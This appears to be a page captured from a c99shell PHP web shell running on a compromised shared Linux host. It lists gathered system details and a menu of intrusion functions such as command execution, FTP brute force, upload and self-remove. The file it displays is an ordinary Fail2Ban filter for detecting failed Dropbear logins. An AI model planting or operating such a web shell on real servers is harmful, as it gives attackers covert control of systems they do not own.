www.jedi-sec.com - c99shell

!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!
Software: Apache. PHP/8.3.27 uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364) Safe-mode: OFF (not secure) /etc/fail2ban/filter.d/ drwxr-xr-x Free 708.97 GB of 879.6 GB (80.6%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Self remove Logout

!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)

Safe-mode: OFF (not secure)

/etc/fail2ban/filter.d/ drwxr-xr-x
Free 708.97 GB of 879.6 GB (80.6%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Self remove Logout

Viewing file: dropbear.conf (1.69 KB) -rw-r--r--
Select action/file-type:
(+) | (+) |

(+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

# Fail2Ban filter for dropbear
#
# NOTE: The regex below is ONLY intended to work with a patched
# version of Dropbear as described here:
# http://www.unchartedbackwaters.co.uk/pyblosxom/static/patches
#            ^%(__prefix_line)sexit before auth from <HOST>.*\s*$
#
# The standard Dropbear output doesn't provide enough information to
# ban all types of attack.  The Dropbear patch adds IP address
# information to the 'exit before auth' message which is always
# produced for any form of non-successful login. It is that message
# which this file matches.
#
# More information: http://bugs.debian.org/546913

[INCLUDES]

# Read common prefixes. If any customizations available -- read them from
# common.local
before = common.conf

[Definition]

_daemon = dropbear

prefregex = ^%(__prefix_line)s<F-CONTENT>(?:[Ll]ogin|[Bb]ad|[Ee]xit).+</F-CONTENT>$

failregex = ^[Ll]ogin attempt for nonexistent user ('.*' )?from <HOST>:\d+$
            ^[Bb]ad (PAM )?password attempt for .+ from <HOST>(:\d+)?$
            ^[Ee]xit before auth \(user '.+', \d+ fails\): Max auth tries reached - user '.+' from <HOST>:\d+\s*$

ignoreregex = 

# DEV Notes:
#
# The first two regexs here match the unmodified dropbear messages. It isn't
# possible to match the source of the 'exit before auth' messages from dropbear
# as they don't include the "from <HOST>" bit.
#
# The second last failregex line we need to match with the modified dropbear.
#
# For the second regex the following apply:
#
# http://www.netmite.com/android/mydroid/external/dropbear/svr-authpam.c
# http://svn.dd-wrt.com/changeset/16642#file64
#
# http://svn.dd-wrt.com/changeset/16642/src/router/dropbear/svr-authpasswd.c
#
# Author: Francis Russell
#         Zak B. Elep

:: Command execute ::
Enter:	Select:

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.1063 ]--